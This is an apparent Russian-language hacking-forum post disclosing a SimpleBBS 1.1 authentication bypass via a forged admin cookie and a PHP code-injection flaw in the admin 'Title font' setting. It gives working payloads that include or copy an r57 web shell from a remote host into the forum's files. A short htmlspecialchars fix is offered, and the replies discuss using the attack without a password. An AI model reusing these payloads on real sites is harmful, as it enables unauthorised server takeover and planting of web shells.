Продукт: SimpleBBS 1.1 Уязвимость: Выполнение произвольного PHP-кода Опасность: Критическая Описание Выполнение PHP кода найдено в скрипте администрирования форума SimpleBBS. В параметре "Title font" в панели администратора можно ввести php-код в виде: Code: phpinfo();die;/* который будет выполнен при прямом обращении к скрипту data/options.php Чтобы получить доступ к панели администрирования достаточно установить cookie с именем SbbCookie и значением - ником администратора. Ник администратора можно получить со страницы пользователей. Для получения шелла потребуется код: Code: include($_GET[c]);die;/* Обращаться - data/options.php?c=http://www.site.com/r57shell.txt или Code: copy($_GET[a],$_GET[ b]);die;/* Обращаться - data/options.php?a=http://www.site.com/r57shell.txt&b=topics.php и шелл будет скопирован в topics.php. Защита Предлагается фильтровать параметр ylarivifont следующим кодом. includes/adminjee3.php Было: PHP: $tallennus = fopen("data/options.php", "w"); flock ($tallennus,2); fwrite($tallennus, "<?php // TITLE FONT, FONTSIZE, FONTCOLOR, BGCOLOR $ylarivifont Заменить на: PHP: $tallennus = fopen("data/options.php", "w"); flock ($tallennus,2); $ylarivifont = htmlspecialchars($ylarivifont); fwrite($tallennus, "<?php // TITLE FONT, FONTSIZE, FONTCOLOR, BGCOLOR $ylarivifont Author: Great
Гугл выдал - SimpleBBS is a free flat-file based bulletin board. It is very easy to install and use, and there are no useless features so even first timers can learn to ... если есть пароль к админке на бюлетене, это будет работать? или может, ЭТО, другие вкусности на бюлетене позволяет? С НОВЫМ 2007! =)
Пароль к админке не нужен. Я описал две баги - вход в админку без пароля и выполнение в админке произвольного кода. если есть пасс, первая бага не нужна. сразу заходи в админку
